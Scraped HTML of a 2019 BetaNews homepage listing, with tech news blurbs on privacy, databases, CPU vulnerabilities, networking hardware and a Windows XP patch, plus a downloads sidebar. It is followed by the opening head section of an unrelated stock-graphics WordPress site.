href="https://betanews.com/2019/05/15/facebook-privacy-issue-expected/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </div> </div> <div class="articleBlurb" id="post-417404"> <h2 class="entry-title"><a href="https://betanews.com/2019/05/15/protecting-sensitive-oracle-data/" title="Permalink to New tool helps protect sensitive data on Oracle databases" rel="bookmark">New tool helps protect sensitive data on Oracle databases</a></h2> <div class="subheader clearfix"> <img src="/wp-content/themes/betanews/images/authors/ianbarker_smallthumb.png" class="authorThumb" alt="" height="40" width="45" /> <div class="metadata"> <div class="author">By <a rel="nofollow author" href="https://betanews.com/author/ianbarker/">Ian Barker</a></div> <div class="postDate">1 day ago</div> </div> <div class="actions"> <ul> <li class="socialshare"><script type="IN/Share" data-url="https://betanews.com/2019/05/15/protecting-sensitive-oracle-data/" data-counter="right"></script></li> <li class="socialshare"><fb:like href="https://betanews.com/2019/05/15/protecting-sensitive-oracle-data/" send="false" layout="button_count" show_faces="false" width="90"></fb:like></li> <li class="socialshare"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://betanews.com/2019/05/15/protecting-sensitive-oracle-data/" data-counturl="https://betanews.com/2019/05/15/protecting-sensitive-oracle-data/" data-via="BetaNews" data-text="New tool helps protect sensitive data on Oracle databases" data-count="horizontal">Tweet</a></li> <li class="comments"><a href="https://betanews.com/2019/05/15/protecting-sensitive-oracle-data/#respond" class="comments">No Comments</a></li> </ul> </div> </div> <div class="body clearfix"> <a href="https://betanews.com/2019/05/15/protecting-sensitive-oracle-data/" title="Permalink to New tool helps protect sensitive data on Oracle databases" rel="bookmark"><img width="150" height="150" src="https://betanews.com/wp-content/uploads/2017/08/personal-data-button-150x150.jpg" class="wp-image-379406 thumb wp-post-image" alt="personal data" srcset="https://betanews.com/wp-content/uploads/2017/08/personal-data-button-150x150.jpg 150w, https://betanews.com/wp-content/uploads/2017/08/personal-data-button-50x50.jpg 50w, https://betanews.com/wp-content/uploads/2017/08/personal-data-button-144x144.jpg 144w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>With GDPR in effect and privacy regulations being planned in other parts of the world, many organizations are looking at their database management to ensure stored data is complaint and doesn’t threaten the business.</p> <p>For Oracle users, <a href="https://www.quest.com/" target="_blank" rel="nofollow noopener">Quest Software</a> is launching its Toad for Oracle -- Sensitive Data Protection (SDP) Module. This allows database admins to to detect and receive notification of personally identifiable information (PII) data residing in databases, select encryption and redaction options immediately after detection, and perform ongoing monitoring</p> <p class="readmore"> <a href="https://betanews.com/2019/05/15/protecting-sensitive-oracle-data/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </div> </div> <div class="articleBlurb" id="post-417397"> <h2 class="entry-title"><a href="https://betanews.com/2019/05/15/perception-vs-reality-in-web-security/" title="Permalink to Perception vs reality in web security" rel="bookmark">Perception vs reality in web security</a></h2> <div class="subheader clearfix"> <img src="/wp-content/themes/betanews/images/authors/ianbarker_smallthumb.png" class="authorThumb" alt="" height="40" width="45" /> <div class="metadata"> <div class="author">By <a rel="nofollow author" href="https://betanews.com/author/ianbarker/">Ian Barker</a></div> <div class="postDate">1 day ago</div> </div> <div class="actions"> <ul> <li class="socialshare"><script type="IN/Share" data-url="https://betanews.com/2019/05/15/perception-vs-reality-in-web-security/" data-counter="right"></script></li> <li class="socialshare"><fb:like href="https://betanews.com/2019/05/15/perception-vs-reality-in-web-security/" send="false" layout="button_count" show_faces="false" width="90"></fb:like></li> <li class="socialshare"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://betanews.com/2019/05/15/perception-vs-reality-in-web-security/" data-counturl="https://betanews.com/2019/05/15/perception-vs-reality-in-web-security/" data-via="BetaNews" data-text="Perception vs reality in web security" data-count="horizontal">Tweet</a></li> <li class="comments"><a href="https://betanews.com/2019/05/15/perception-vs-reality-in-web-security/#comments" class="comments">1 Comment</a></li> </ul> </div> </div> <div class="body clearfix"> <a href="https://betanews.com/2019/05/15/perception-vs-reality-in-web-security/" title="Permalink to Perception vs reality in web security" rel="bookmark"><img width="150" height="150" src="https://betanews.com/wp-content/uploads/2017/06/Website-address-bar-150x150.jpg" class="wp-image-375249 thumb wp-post-image" alt="web address bar" srcset="https://betanews.com/wp-content/uploads/2017/06/Website-address-bar-150x150.jpg 150w, https://betanews.com/wp-content/uploads/2017/06/Website-address-bar-50x50.jpg 50w, https://betanews.com/wp-content/uploads/2017/06/Website-address-bar-144x144.jpg 144w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>A new study from <a href="https://www.harrispollonline.com/" target="_blank" rel="nofollow noopener">Harris Poll</a>, commissioned by <a href="https://www.google.com/" target="_blank" rel="nofollow noopener">Google</a> shows that while more people than ever are using the internet -- with 1.4 billion expected to be online by 2022 -- there's a gap between perception and reality in regard to online safety.</p> <p>In the study 55 percent of Americans aged 16 or over gave themselves an A or B in online safety and security, but the results don't back this up. 70 percent wrongly identified what a safe URL should look like and 97 percent got at least one question wrong on a basic six-question security test.</p> <p class="readmore"> <a href="https://betanews.com/2019/05/15/perception-vs-reality-in-web-security/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </div> </div> <div class="articleBlurb" id="post-417391"> <h2 class="entry-title"><a href="https://betanews.com/2019/05/15/check-if-vulnerable-to-microarchitectural-data-sampling-mds-attacks/" title="Permalink to How to check if your Windows or Linux system is vulnerable to Microarchitectural Data Sampling (MDS) attacks" rel="bookmark">How to check if your Windows or Linux system is vulnerable to Microarchitectural Data Sampling (MDS) attacks</a></h2> <div class="subheader clearfix"> <img src="/wp-content/themes/betanews/images/authors/wwilliams_smallthumb.png" class="authorThumb" alt="" height="40" width="45" /> <div class="metadata"> <div class="author">By <a rel="nofollow author" href="https://betanews.com/author/waynewill1/">Wayne Williams</a></div> <div class="postDate">1 day ago</div> </div> <div class="actions"> <ul> <li class="socialshare"><script type="IN/Share" data-url="https://betanews.com/2019/05/15/check-if-vulnerable-to-microarchitectural-data-sampling-mds-attacks/" data-counter="right"></script></li> <li class="socialshare"><fb:like href="https://betanews.com/2019/05/15/check-if-vulnerable-to-microarchitectural-data-sampling-mds-attacks/" send="false" layout="button_count" show_faces="false" width="90"></fb:like></li> <li class="socialshare"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://betanews.com/2019/05/15/check-if-vulnerable-to-microarchitectural-data-sampling-mds-attacks/" data-counturl="https://betanews.com/2019/05/15/check-if-vulnerable-to-microarchitectural-data-sampling-mds-attacks/" data-via="BetaNews" data-text="How to check if your Windows or Linux system is vulnerable to Microarchitectural Data Sampling (MDS) attacks" data-count="horizontal">Tweet</a></li> <li class="comments"><a href="https://betanews.com/2019/05/15/check-if-vulnerable-to-microarchitectural-data-sampling-mds-attacks/#comments" class="comments">6 Comments</a></li> </ul> </div> </div> <div class="body clearfix"> <a href="https://betanews.com/2019/05/15/check-if-vulnerable-to-microarchitectural-data-sampling-mds-attacks/" title="Permalink to How to check if your Windows or Linux system is vulnerable to Microarchitectural Data Sampling (MDS) attacks" rel="bookmark"><img width="150" height="150" src="https://betanews.com/wp-content/uploads/2019/05/Shocked-150x150.jpg" class="wp-image-417393 thumb wp-post-image" alt="" srcset="https://betanews.com/wp-content/uploads/2019/05/Shocked-150x150.jpg 150w, https://betanews.com/wp-content/uploads/2019/05/Shocked-50x50.jpg 50w, https://betanews.com/wp-content/uploads/2019/05/Shocked-144x144.jpg 144w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>Intel yesterday disclosed a new group of Microarchitectural Data Sampling (MDS) hardware vulnerabilities that affect its CPUs.</p> <p>Rogue In-Flight Data Load (RIDL), Fallout, and ZombieLoad speculative execution attacks are related to <a href="https://betanews.com/2018/01/03/intel-security-flaw/">Spectre and Meltdown</a> which were discovered last year, and allow attackers to leak in-flight data from CPU-internal buffers (Line Fill Buffers, Load Ports, Store Buffers), including data never stored in CPU caches.</p> <p class="readmore"> <a href="https://betanews.com/2019/05/15/check-if-vulnerable-to-microarchitectural-data-sampling-mds-attacks/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </div> </div> <div class="articleBlurb" id="post-417372"> <h2 class="entry-title"><a href="https://betanews.com/2019/05/14/trendnet-usbc-dongle-25g-5g/" title="Permalink to TRENDnet unveils USB-C 3.1 to 2.5GBASE-T and 5GBASE-T Ethernet adapters" rel="bookmark">TRENDnet unveils USB-C 3.1 to 2.5GBASE-T and 5GBASE-T Ethernet adapters</a></h2> <div class="subheader clearfix"> <img src="/wp-content/themes/betanews/images/authors/bfagioli_smallthumb.png" class="authorThumb" alt="" height="40" width="45" /> <div class="metadata"> <div class="author">By <a rel="nofollow author" href="https://betanews.com/author/brianfagioli/">Brian Fagioli</a></div> <div class="postDate">2 days ago</div> </div> <div class="actions"> <ul> <li class="socialshare"><script type="IN/Share" data-url="https://betanews.com/2019/05/14/trendnet-usbc-dongle-25g-5g/" data-counter="right"></script></li> <li class="socialshare"><fb:like href="https://betanews.com/2019/05/14/trendnet-usbc-dongle-25g-5g/" send="false" layout="button_count" show_faces="false" width="90"></fb:like></li> <li class="socialshare"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://betanews.com/2019/05/14/trendnet-usbc-dongle-25g-5g/" data-counturl="https://betanews.com/2019/05/14/trendnet-usbc-dongle-25g-5g/" data-via="BetaNews" data-text="TRENDnet unveils USB-C 3.1 to 2.5GBASE-T and 5GBASE-T Ethernet adapters" data-count="horizontal">Tweet</a></li> <li class="comments"><a href="https://betanews.com/2019/05/14/trendnet-usbc-dongle-25g-5g/#comments" class="comments">3 Comments</a></li> </ul> </div> </div> <div class="body clearfix"> <a href="https://betanews.com/2019/05/14/trendnet-usbc-dongle-25g-5g/" title="Permalink to TRENDnet unveils USB-C 3.1 to 2.5GBASE-T and 5GBASE-T Ethernet adapters" rel="bookmark"><img width="150" height="150" src="https://betanews.com/wp-content/uploads/2019/05/TUC-ET2G_v1.0R_d04_2-150x150.png" class="wp-image-417379 thumb wp-post-image" alt="" srcset="https://betanews.com/wp-content/uploads/2019/05/TUC-ET2G_v1.0R_d04_2-150x150.png 150w, https://betanews.com/wp-content/uploads/2019/05/TUC-ET2G_v1.0R_d04_2-50x50.png 50w, https://betanews.com/wp-content/uploads/2019/05/TUC-ET2G_v1.0R_d04_2-144x144.png 144w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>For most consumers, Gigabit Ethernet (1 Gbit/s) is more than enough. After all, they likely only use a hardwired network connection when accessing the internet, which typically won't even fully saturate the connection. Hell, many don't even do that -- some households strictly have Wi-Fi devices, with the only use of a cable being the connection from their router to the modem.</p> <p>Some enthusiasts and business users don't only use Ethernet for getting on the internet -- they may have high-speed internal networks where they are moving files between various hardwired computers and network-attached storage devices. And sometimes Gigabit speeds wont cut it. These folks may opt for 2.5GBASE-T (2.5Gbit/s), 5GBASE-T (5Gbit/s), or even 10GBASE-T (10Gbit/s) networks.</p> <p class="readmore"> <a href="https://betanews.com/2019/05/14/trendnet-usbc-dongle-25g-5g/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </div> </div> <div class="articleBlurb" id="post-417368"> <h2 class="entry-title"><a href="https://betanews.com/2019/05/14/guardrails-for-developers/" title="Permalink to Providing guardrails for developers to innovate while staying secure in the cloud" rel="bookmark">Providing guardrails for developers to innovate while staying secure in the cloud</a></h2> <div class="subheader clearfix"> <img src="/wp-content/themes/betanews/images/authors/staff_smallthumb.png" class="authorThumb" alt="" height="40" width="45" /> <div class="metadata"> <div class="author">By <a rel="nofollow author" href="http://www.divvycloud.com">Chris DeRamus</a></div> <div class="postDate">2 days ago</div> </div> <div class="actions"> <ul> <li class="socialshare"><script type="IN/Share" data-url="https://betanews.com/2019/05/14/guardrails-for-developers/" data-counter="right"></script></li> <li class="socialshare"><fb:like href="https://betanews.com/2019/05/14/guardrails-for-developers/" send="false" layout="button_count" show_faces="false" width="90"></fb:like></li> <li class="socialshare"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://betanews.com/2019/05/14/guardrails-for-developers/" data-counturl="https://betanews.com/2019/05/14/guardrails-for-developers/" data-via="BetaNews" data-text="Providing guardrails for developers to innovate while staying secure in the cloud" data-count="horizontal">Tweet</a></li> <li class="comments"><a href="https://betanews.com/2019/05/14/guardrails-for-developers/#respond" class="comments">No Comments</a></li> </ul> </div> </div> <div class="body clearfix"> <a href="https://betanews.com/2019/05/14/guardrails-for-developers/" title="Permalink to Providing guardrails for developers to innovate while staying secure in the cloud" rel="bookmark"><img width="150" height="150" src="https://betanews.com/wp-content/uploads/2018/06/Cloud-resistance-150x150.jpg" class="wp-image-400513 thumb wp-post-image" alt="resistance to cloud" srcset="https://betanews.com/wp-content/uploads/2018/06/Cloud-resistance-150x150.jpg 150w, https://betanews.com/wp-content/uploads/2018/06/Cloud-resistance-50x50.jpg 50w, https://betanews.com/wp-content/uploads/2018/06/Cloud-resistance-144x144.jpg 144w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>Enterprise cloud adoption has largely been driven by developers eager to take advantage of its agility. These developers are often moving very quickly and are under pressure to bring new products to market that provide competitive advantages. The speed of development combined with a lack of cloud security expertise often results in engineers and developers bypassing certain security and compliance policies. The result is a chaotic, "Wild, Wild West" cloud environment.</p> <p>Alongside innovative apps and services, a common byproduct of this "free for all" mentality is data breaches, thanks to misconfigurations and other security glitches. This article shares advice on how organizations can empower their developers and engineers by providing a safe framework within which to operate, so they can stay agile and innovative, without inadvertently compromising security.</p> <p class="readmore"> <a href="https://betanews.com/2019/05/14/guardrails-for-developers/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </div> </div> <div class="articleBlurb" id="post-417365"> <h2 class="entry-title"><a href="https://betanews.com/2019/05/14/stress-in-the-workplace/" title="Permalink to 59% of adults experience stress in the workplace -- could business technology provide a means to help reduce this figure?" rel="bookmark">59% of adults experience stress in the workplace -- could business technology provide a means to help reduce this figure?</a></h2> <div class="subheader clearfix"> <img src="/wp-content/themes/betanews/images/authors/staff_smallthumb.png" class="authorThumb" alt="" height="40" width="45" /> <div class="metadata"> <div class="author">By <a rel="nofollow author" href="https://betanews.com/author/staff/">Natasha Bougourd</a></div> <div class="postDate">2 days ago</div> </div> <div class="actions"> <ul> <li class="socialshare"><script type="IN/Share" data-url="https://betanews.com/2019/05/14/stress-in-the-workplace/" data-counter="right"></script></li> <li class="socialshare"><fb:like href="https://betanews.com/2019/05/14/stress-in-the-workplace/" send="false" layout="button_count" show_faces="false" width="90"></fb:like></li> <li class="socialshare"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://betanews.com/2019/05/14/stress-in-the-workplace/" data-counturl="https://betanews.com/2019/05/14/stress-in-the-workplace/" data-via="BetaNews" data-text="59% of adults experience stress in the workplace -- could business technology provide a means to help reduce this figure?" data-count="horizontal">Tweet</a></li> <li class="comments"><a href="https://betanews.com/2019/05/14/stress-in-the-workplace/#respond" class="comments">No Comments</a></li> </ul> </div> </div> <div class="body clearfix"> <a href="https://betanews.com/2019/05/14/stress-in-the-workplace/" title="Permalink to 59% of adults experience stress in the workplace -- could business technology provide a means to help reduce this figure?" rel="bookmark"><img width="150" height="150" src="https://betanews.com/wp-content/uploads/2013/10/stressed-businesswoman-150x150.jpg" class="wp-image-190377 thumb wp-post-image" alt="workplace stress" srcset="https://betanews.com/wp-content/uploads/2013/10/stressed-businesswoman-150x150.jpg 150w, https://betanews.com/wp-content/uploads/2013/10/stressed-businesswoman-50x50.jpg 50w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>The combination of technology and mental health can often have negative connotations. There is plenty of media attention surrounding the negative impact the former can have on the latter. In fact, there is research identifying that social media and too much screen time can increase the risk of depression and anxiety, which can lead to hampered sleep and increased stress levels. A recipe for disaster?</p> <p>Looking at the other side of the coin, technology can also work to improve mental health and stress levels. In recent years, technology has brought about hugely beneficial health apps like Headspace, Calm and Stop, Breathe &amp; Think. This has provided people with a way to help manage their own mental health conditions on a daily basis, such as anxiety and depression. Businesses can also employ different technologies to help address workplace stress. Together, let’s take a deeper look at that below…</p> <p class="readmore"> <a href="https://betanews.com/2019/05/14/stress-in-the-workplace/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </div> </div> <div class="articleBlurb" id="post-417361"> <h2 class="entry-title"><a href="https://betanews.com/2019/05/14/new-patch-for-windows-xp/" title="Permalink to Microsoft issues new patch for Windows XP to fight a dangerous &#039;wormable&#039; vulnerability" rel="bookmark">Microsoft issues new patch for Windows XP to fight a dangerous 'wormable' vulnerability</a></h2> <div class="subheader clearfix"> <img src="/wp-content/themes/betanews/images/authors/wwilliams_smallthumb.png" class="authorThumb" alt="" height="40" width="45" /> <div class="metadata"> <div class="author">By <a rel="nofollow author" href="https://betanews.com/author/waynewill1/">Wayne Williams</a></div> <div class="postDate">2 days ago</div> </div> <div class="actions"> <ul> <li class="socialshare"><script type="IN/Share" data-url="https://betanews.com/2019/05/14/new-patch-for-windows-xp/" data-counter="right"></script></li> <li class="socialshare"><fb:like href="https://betanews.com/2019/05/14/new-patch-for-windows-xp/" send="false" layout="button_count" show_faces="false" width="90"></fb:like></li> <li class="socialshare"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://betanews.com/2019/05/14/new-patch-for-windows-xp/" data-counturl="https://betanews.com/2019/05/14/new-patch-for-windows-xp/" data-via="BetaNews" data-text="Microsoft issues new patch for Windows XP to fight a dangerous 'wormable' vulnerability" data-count="horizontal">Tweet</a></li> <li class="comments"><a href="https://betanews.com/2019/05/14/new-patch-for-windows-xp/#comments" class="comments">14 Comments</a></li> </ul> </div> </div> <div class="body clearfix"> <a href="https://betanews.com/2019/05/14/new-patch-for-windows-xp/" title="Permalink to Microsoft issues new patch for Windows XP to fight a dangerous &#039;wormable&#039; vulnerability" rel="bookmark"><img width="150" height="150" src="https://betanews.com/wp-content/uploads/2019/05/Windows_XP-Patch-150x150.jpg" class="wp-image-417362 thumb wp-post-image" alt="" srcset="https://betanews.com/wp-content/uploads/2019/05/Windows_XP-Patch-150x150.jpg 150w, https://betanews.com/wp-content/uploads/2019/05/Windows_XP-Patch-50x50.jpg 50w, https://betanews.com/wp-content/uploads/2019/05/Windows_XP-Patch-144x144.jpg 144w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p><a href="https://betanews.com/topic/microsoft/">Microsoft</a> stopped supporting <a href="https://betanews.com/topic/windows-xp/">Windows XP</a> back into 2014, but took the 'highly unusual' step of <a href="https://betanews.com/2017/05/13/microsoft-patches-windows-xp-to-fight-wannacrypt-ransomware-attacks/">releasing a patch for the ancient OS</a> two years ago in a bid to fightback against the WannaCry ransomware, and then included XP in that <a href="https://betanews.com/2017/06/13/windows-xp-patch-tuesday/">June’s Patch Tuesday updates</a>.</p> <p>You’d be forgiven for thinking that that would be the very last time Microsoft patched XP, but no. The software giant has included Windows XP and Windows Server 2003 (also no longer supported) in today’s Patch Tuesday fixes.</p> <p class="readmore"> <a href="https://betanews.com/2019/05/14/new-patch-for-windows-xp/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </div> </div> <!-- paging --> <div class="loadMore"><a href="https://betanews.com/page/2/" data-action="load-next-page">Load More Articles</a></div> </div> </div> </div><!-- #wideCol --> <div class="sideCol"> <div class="content submitNews"> <a href="mailto:[email protected]">Got News? Contact Us</a> </div> <div class="flexibleBoxad"> <div data-ns="halfpage"></div> </div> <div class="section facebook clearfix"> <div class="content" style="padding-top: 15px;"> <div class="fb-page" data-href="https://www.facebook.com/BetaNews-167777169963870" data-height="500" data-small-header="true" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true" data-show-posts="true"></div> </div> </div> <div class="section fileforum tabbed"> <div class="icon download"></div> <div class="tabTop"> <h2><a href="https://fileforum.betanews.com">fileforum <small>downloads</small></a></h2> <div class="tabRow"> <ul class="tabs clearfix" id="fileforum-tab-switch"> <li class="active"><a href="#" data-tab="recent-updates">New Files</a></li> <li><a href="#" data-tab="popular-downloads">Top Downloads</a></li> </ul> </div> </div> <div class="content"> <div id="recent-updates"> <div class="headline first"> <h4><a href="https://fileforum.betanews.com/detail/UnHackMe/1103207240/1">UnHackMe 10.60.0.810</a></h4> <div class="postDate">1 hour ago</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/HWiNFO/950009060/1">HWiNFO 6.06</a></h4> <div class="postDate">20 hours ago</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/VirtualBox-for-Windows/1172769426/1">VirtualBox for Windows 6.0.8</a></h4> <div class="postDate">24 hours ago</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/WindowBlinds/947721727/1">WindowBlinds 18.80</a></h4> <div class="postDate">24 hours ago</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/FrostWire-for-Windows/1132411840/1">FrostWire for Windows 6.8.0 Build 280 RC</a></h4> <div class="postDate">1 day ago</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/SMPlayer/1187725311/1">SMPlayer 19.5.0</a></h4> <div class="postDate">1 day ago</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/Avira-Free-Antivirus/1032566653/1">Avira Free Antivirus 15.0.1905.1271</a></h4> <div class="postDate">2 days ago</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/Skype-for-Windows/1062684717/1">Skype for Windows 8.45.0.41</a></h4> <div class="postDate">2 days ago</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/Audacity-for-Windows/1023856334/1">Audacity for Windows 2.3.2</a></h4> <div class="postDate">2 days ago</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/NirLauncher/1312826775/1">NirLauncher 1.22.8</a></h4> <div class="postDate">2 days ago</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/FreeFileSync/1330385155/1">FreeFileSync 10.12</a></h4> <div class="postDate">2 days ago</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/Glary-Utilities-Pro/1186391453/1">Glary Utilities Pro 5.119</a></h4> <div class="postDate">2 days ago</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/CCleaner-for-Windows/1100194579/1">CCleaner for Windows 5.57.7182</a></h4> <div class="postDate">2 days ago</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/Adobe-Acrobat-Reader-DC-for-Windows/942951453/1">Adobe Acrobat Reader DC for Windows 2019.012.20034</a></h4> <div class="postDate">2 days ago</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/DisplayFusion/1225079293/1">DisplayFusion 9.5 Beta 3</a></h4> <div class="postDate">2 days ago</div> </div> </div><!-- /#recent-updates --> <div id="popular-downloads" style="display: none;"> <div class="headline first"> <h4><a href="https://fileforum.betanews.com/detail/BurnAware-Free/1212419334/2">BurnAware Free</a></h4> <div class="postDate">27,446 downloads</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/PDF-Shaper-Free/1364214245/1">PDF Shaper Free</a></h4> <div class="postDate">3,757 downloads</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/ImgBurn/1128426215/1">ImgBurn</a></h4> <div class="postDate">2,950 downloads</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/ISO-Workshop/1298919978/1">ISO Workshop</a></h4> <div class="postDate">1,726 downloads</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/DVD-Decrypter/1011845169/1">DVD Decrypter</a></h4> <div class="postDate">1,087 downloads</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/IrfanView/967963863/1">IrfanView</a></h4> <div class="postDate">594 downloads</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/Image-Tuner/1414430267/1">Image Tuner</a></h4> <div class="postDate">510 downloads</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/Spybot-Search-Destroy/1043809773/1">Spybot - Search &amp; Destroy</a></h4> <div class="postDate">417 downloads</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/KLite-Codec-Pack-Full/1094057842/3">K-Lite Codec Pack Full</a></h4> <div class="postDate">399 downloads</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/500th-Video-Converter/1519239146/1">500th Video Converter</a></h4> <div class="postDate">374 downloads</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/DVD43-Plugin/1118268636/2">DVD43 Plug-in</a></h4> <div class="postDate">374 downloads</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/True-Burner/1392136400/1">True Burner</a></h4> <div class="postDate">363 downloads</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/IrfanView-PlugIns/1099412658/1">IrfanView PlugIns</a></h4> <div class="postDate">207 downloads</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/Microsoft-Windows-and-Office-ISO-Download-Tool/1467397598/1">Microsoft Windows and Office ISO Download Tool</a></h4> <div class="postDate">192 downloads</div> </div> <div class="headline"> <h4><a href="https://fileforum.betanews.com/detail/Adobe-Flash-Player-for-Windows-Firefox/964714156/8">Adobe Flash Player for Windows (Firefox)</a></h4> <div class="postDate">174 downloads</div> </div> </div><!-- /#popular-downloads --> </div> </div> <div class="flexibleBoxad"> <div data-ns="rectangle"></div> </div> </div> </div><!-- #bd --> <div id="ft"> <div class="fineprint"> <p>&copy; 1998-2019 BetaNews, Inc. All Rights Reserved. <a href="/privacy-policy">Privacy Policy</a> - <a href="/cookie-policy">Cookie Policy</a>.</p> </div> </div> </div><!-- #page --> <script type="text/javascript"> (function() { var s = document.createElement('SCRIPT'); var c = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = 'https://platform.twitter.com/widgets.js'; c.parentNode.insertBefore(s, c); })(); </script> <script> jQuery(document).ready(function($) { $.getScript("https://platform.linkedin.com/in.js?async=true", function success() { IN.init({ }); }); }); </script> <script type="text/javascript" src="https://betanews.com/wp-content/themes/betanews/js/facebox.js"></script> <script type="text/javascript" src="https://betanews.com/wp-content/themes/betanews/js/application.js"></script> <script src="https://apis.google.com/js/platform.js" async defer></script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <style id="kirki-css-vars">:root{}</style><title>StockElementsFX &#8211; Stock Graphics</title> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="StockElementsFX &raquo; Feed" href="https://www.stockelementsfx.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="StockElementsFX &raquo; Comments Feed" href="https://www.stockelementsfx.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.stockelementsfx.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <style class='custom-scrollbar' type='text/css'>@media only screen and (min-width: 1px) {.elementor-element-ebaa11c { max-height: 722px; overflow-y: auto; overflow-x: hidden;}}</style><link rel='stylesheet' id='contact-form-7-css' href='https://www.stockelementsfx.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='edd-styles-css' href='https://www.stockelementsfx.com/wp-content/plugins/easy-digital-downloads/templates/edd.min.css?ver=2.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='twenty20-style-css' href='https://www.stockelementsfx.com/wp-content/plugins/twenty20/assets/css/twenty20.css?ver=1.54' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-layout-css' 